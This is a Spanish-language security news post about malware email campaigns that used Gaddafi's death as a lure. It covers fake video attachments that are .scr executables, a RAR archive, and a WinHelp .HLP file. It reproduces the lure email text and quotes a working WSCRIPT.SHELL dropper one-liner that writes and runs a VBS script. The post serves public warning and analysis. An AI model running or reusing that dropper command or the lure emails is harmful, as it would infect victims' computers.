La muerte del dictador libio sirve para generar en el mundo entero una serie de estafas y timos online que utilizan la muerte de Gadafi como cebo, estan proliferando en las últimas horas y confirman la fascinación de los 'hackers' por la muerte de celebridades como gancho para engañar a los usuarios.
Los ciberangelitos intentan engañar a los usuarios con la promesa de vídeos sobre la muerte del dictador para propagar malware y estafas.
Uno de estos mail que supuestamente contenía un clip. Wmv de Gaddafi inmediatamente después de su captura. El correo electrónico fue escrito en portugués y dice que "VEJA VIDEOS DE OS do Corpo Muammar Gaddafi, APOS SER CAPTURADO Pelos REBELDES", que se traduce en "Vea los videos del cuerpo de Muammar Gaddafi, después de ser capturado por los rebeldes".
El archivo adjunto que parece ser un archivo de Windows Media, sino que es un archivo. Scr llamado "
fotosweb.scr", que es un ejecutable independiente.
Una vez ejecutado el código malicioso se añade a la ruta de RUN del registro del sistema para asegurarse de que se ejecuta cada vez que se reinicie el equipo, y luego se oculta.
Subject: Fw: AFP Photo News: Bloody Photos: Libya dictator Moammar Gadhafi's Death Message body:
Libya dictator Moammar Gadhafi's Death
Libyan dictator Moammar Gadhafi, the most wanted man in the world, has been killed, the country's rebel government claimed Oct. 20. The flamboyant tyrant who terrorized his country and much of the world during his 42 years of despotic rule was cornered by insurgents in the town of Sirte, where Gadhafi had been born and a stronghold of his supporters.
Attached file: Bloody Photos_Gadhafi_Death.rar
Los usuarios de Windows que descomprimen el archivo adjunto están poniendo sus equipos en riesgo de infección. El archivo RAR crea el archivo malicioso se llama:
Bloody Photos_Gadhafi_DeathGadhafi?rar.scr
El archivo adjunto es una especie de dinosaurio. Se trata de un archivo *. HLP. El formato de archivo HLP fue utilizado por WinHelp en versiones anteriores de Windows XP, y normalmente contienen información útil sobre el uso de las aplicaciones. Sin embargo, también hace uso de un lenguaje de macros,con lo que se podría hacer un montón de cosas, incluyendo la ejecución de archivos a través de la macro EF ().
El archivo ejecuta un script oculto
new ActiveXObject('WSCRIPT.SHELL').RUN('CMD /C FOR /F "USEBACKQDELIMS=" %I IN (`DIR/B *.HLP`)DO FINDSTR /B INT3 "%I">C:/A.VBS&C:/A.VBS',0);close()
Este escript descarga el malware que es un troyano, posiblemente de China.